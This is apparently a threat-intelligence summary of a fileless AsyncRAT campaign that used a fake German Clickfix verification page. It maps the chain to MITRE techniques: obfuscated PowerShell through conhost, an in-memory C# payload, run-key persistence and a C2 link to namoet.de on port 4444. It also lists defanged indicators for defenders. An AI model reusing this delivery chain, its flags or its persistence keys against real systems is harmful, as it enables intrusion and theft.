A fileless AsyncRAT campaign uses obfuscated PowerShell commands hosted on a fake Clickfix verification page targeting German-speaking users. The malware establishes persistence via registry keys and maintains a TCP connection to a remote C2 server, enabling full remote control without dropping files to disk. #AsyncRAT #Clickfix #PowerShell #namoetde
Keypoints
- The malware is delivered through a phishing page impersonating Clickfix, targeting German-speaking users using a fake verification prompt in German.
- The attack uses conhost.exe to stealthily execute obfuscated PowerShell commands that download and run a second-stage payload entirely in memory.
- AsyncRAT establishes persistence by setting registry run keys under HKCU to ensure execution on user logon.
- The core payload consists of reversed and base64-encoded C# code compiled in memory using PowerShell’s Add-Type cmdlet.
- It creates a persistent TCP client connection to namoet.de on port 4444 for command and control.
- The malware enables full remote control capabilities, including command execution, credential theft, data exfiltration, and process management.
- Mitigation efforts focus on blocking suspicious PowerShell execution, monitoring registry changes, scanning memory with YARA rules, and restricting LOLBin abuses.
MITRE Techniques
- [T1059.001] Command and Scripting Interpreter: PowerShell – Executes obfuscated PowerShell payload via conhost.exe with hidden and no-profile flags to avoid detection. (“Executes PowerShell payload using –headless, -w hidden, -nop, -c flags”)
- [T1105] Ingress Tool Transfer – Downloads second-stage payload from http://namoet[.]de/x using Invoke-WebRequest. (“Downloads second stage (http://namoet[.]de/x) using Invoke-WebRequest”)
- [T1027] Obfuscated Files or Information – Uses reversed and fragmented base64-encoded strings to obfuscate the payload. (“Payload obfuscation and decoding with reversed, base64-encoded C# payload embedded in a PowerShell string”)
- [T1127.001] Compile After Delivery – Compiles and executes embedded C# code at runtime using Add-Type in PowerShell. (“Uses Add-Type to compile and run embedded .NET code at runtime”)
- [T1071.001, T1571] Application Layer Protocol: Web Protocols, Non-Standard Port – Maintains a persistent TCP connection to a C2 server on port 4444. (“Maintains persistent C2 connection to attacker over TCP (port 4444)”)
- [T1056.001] Input Capture: Keylogging / Terminal I/O – Redirects standard input and output streams for command execution and data exfiltration. (“Redirects standard input/output for command execution and interprocess communication”)
- [T1547.001] Registry Run Keys / Startup Folder – Establishes persistence by creating registry keys under HKCU to auto-launch malware on boot. (“Sets HKCU:…RunOnce and HKCU:…Windows keys with launcher commands”)
- [T1055.001] Process Injection – Manipulates byte arrays and may perform in-memory code injection (optional in the loader). (“Converts byte arrays to shellcode or DLL for injection”)
- [T1027.002, T1140] Obfuscated Files: Reversible Encoding, Deobfuscate/Decode Files or Information – Uses string reversal and dynamic decoding to evade detection. (“Reverse-order strings, dynamic decoding, reflective loading used to evade detection”)
Indicators of Compromise
- [IP] Clickfix delivery infrastructure – 109.250.111[.]155, 109.250.109[.]80, and multiple other IPs used for delivery
- [FQDN] Command and Control server – namoet[.]de used for hosting the PowerShell payload and TCP C2 communication
- [Port] TCP reverse shell listener port – 4444 used by AsyncRAT for persistent C2 communication
- [URL] PowerShell payload location – hxxp[:]//namoet[.]de:80/x delivering the obfuscated payload
- [Registry] Persistence keys – HKCU:SOFTWAREMicrosoftWindowsCurrentVersionRunOncewindows and HKCU:SOFTWAREMicrosoftWindows NTCurrentVersionWindowswin used to maintain startup execution